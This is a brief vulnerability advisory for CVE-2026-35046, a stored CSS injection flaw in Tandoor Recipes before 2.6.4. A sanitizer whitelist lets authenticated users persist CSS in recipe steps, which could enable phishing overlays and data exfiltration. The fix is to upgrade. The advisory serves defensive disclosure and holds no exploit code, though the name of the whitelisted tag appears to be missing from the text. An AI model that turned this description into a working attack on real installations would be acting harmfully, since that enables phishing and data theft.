CVE-2026-35046

Name of the Vulnerable Software and Affected Versions Tandoor Recipes versions prior to 2.6.4

Description Tandoor Recipes allows authenticated users to inject arbitrary tags into recipe step instructions. The bleach.clean() sanitizer explicitly whitelists the tag, allowing unsanitized CSS payloads to be persisted and served via the API. Clients consuming instructions markdown from the API and rendering it as HTML without additional sanitization will execute attacker-controlled CSS, potentially enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration.

Recommendations Update to version 2.6.4 or later.